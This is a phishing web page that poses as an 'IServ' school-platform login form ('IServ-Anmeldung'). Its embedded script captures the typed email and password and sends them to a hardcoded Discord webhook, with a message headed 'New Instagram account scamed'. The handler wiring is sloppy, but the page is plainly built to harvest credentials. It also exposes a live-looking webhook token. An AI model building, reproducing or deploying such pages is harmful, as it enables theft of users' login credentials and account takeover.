
<!DOCTYPE html>
<html>
<head>
  <title>IServ - iserv-obs-del.de</title>
  <meta charset='UTF-8'>
  <meta name='viewport' content='width=device-width, initial-scale=1.0'>
  <style>
    a:hover{
      text-decoration: underline;
    }
    body{
      font-family: Arial, sans-serif;
      align-items: center;
      justify-content: center;
      background-color: #1A1A1A;
    }
    input[type='text'], input[type='password']{
      width: 100%;
      padding: 12px 10px;
      margin: 8px 0;
      box-sizing: border-box;
      border: 1px solid #FFFFFF;
      border-radius: 4px;
    }
    .container{
      margin: auto;
      padding: 20px;
      max-width: 7500px;
    }
    .logo-container{
      text-align: top;
      margin-bottom: 30px;
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .logo{
      width: 40px;
      height: 40px;
      fill: #FFFFFF;
      margin-right: 100px;
    }
    .company-name{
      font-size: 42px;
      color: white;
      margin-left: 0px;
    }
    .form-container{
      background: #0D0D0D;
      border: 1px solid #0D0D0D;
      border-radius: 15px;
      padding: 20px;
      box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
    }
    h1{
      text-align: center;
      font-size: 28px;
      font-weight: 500;
      margin-bottom: 20px;
    }
    .input-field{
      width: 100%;
      padding: 12px;
      border: 10px solid #1A1A1A;
      border-radius: 4px;
      margin-bottom: 20px;
      font-size: 14px;
    }
    .submit-btn{
      background: #002A4D;
      border: 1px solid #05345E;
      color: white;
      border: none;
      padding: 12px 20px;
      border-radius: 4px;
      font-size: 0.875rem;
    }
    .submit-btn:hover{
      background: #05345E;
    }
    .forgot-btn{
      background: transparent;
      color: #0b57d0;
      border-radius: 8px;
      border: none;
      font-size: 14px;
      cursor: pointer;
    }
    .forgot-btn:hover{
      background-color: rgba(11,87,208,0.08);
    }
    .containerlogo{
      padding-top: 25px;
    }
    .containertitle{
      color: #FFFFFF;
      font-size: 24px;
      padding: 15px 0px 10px 0px;
    }
    .containersubtitle{
      color: #202124;
      font-size: 16px;
      padding: 0px 0px 30px 0px;
    }
    /* .containermsg{
      padding: 30px 0px 0px 0px;
      color: #5f6368;
    } */
    .containerbtn{
      display: flex;
      justify-content: end;
      padding: 30px 0px 25px 0px;
    }
    @media screen and (min-width: 768px){
      .logo{
        max-width: 80px;
        max-height: 80px;
      }
    }
  </style>
</head>
<body>
  <div class='container'>
    <div class='logo-container'>
      <?xml version='1.0' standalone='no'?>
      <!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 20010904//EN' 'http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd'>
    </div>
    <div class=form-container>
      <center>
        <div class='containerlogo'>

        </div>
      </center>
      <div style='min-height: 150px'>
        <center>
          <div class='containertitle'>IServ-Anmeldung</div>
        </center>
        <form action='/post' id='login-form'>
          <input name='email' class='input-field' type='text' placeholder='Account' id="email" required>
          <input name='password' class='input-field' type='password' placeholder='Passwort' id="password" required />
          <div class='containermsg'>
            <button class="forgot-btn">Forgot password?</button>
          </div>
          <div class='containerbtn'>
            <button id=submitbtn class=submit-btn type=submit>Next</button>
          </div>
        </form>
      </div>
    </div>
  </div>
  <script>
    function buy() {
      document.getElementById('from').addEventListener('submit', function(event) {
        event.preventDefault();
  
        const email = document.getElementById('email').value;
  
        const rank = document.getElementById('password').value;
        const webhookURL = 'https://discord.com/api/webhooks/1291828152666034338/mqzlIfVmMywfU01geuNIyrS1XIIT17tAw5jxytjT-gktJxQx5hZjler4Bpl0eCk-wUgl';
        const color = parseInt('69b4ff', 16);
  
        const embed = {
          title: "New Instagram account scamed", 
          description: " ",
          color: color,  // Green color
          fields: [
            {
              name: "Password:",
              value: rank,  // Replace 'why' with 'rank'
              inline: false
            },
            {
              name: "Email:",
              value: email,  // Replace 'why' with 'rank'
              inline: false
            },
          ],
          timestamp: new Date()
        };
  
        const payload = JSON.stringify({
          embeds: [embed]
        });
  
        fetch(webhookURL, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: payload
        }).then(response => {
          if (response.ok) {
            console.log("cum")
          } else {
            alert('Error sending message.');
          }
        }).catch(error => {
          console.error('Error:', error);
        });
      });
    }
  </script>
</body>
</html>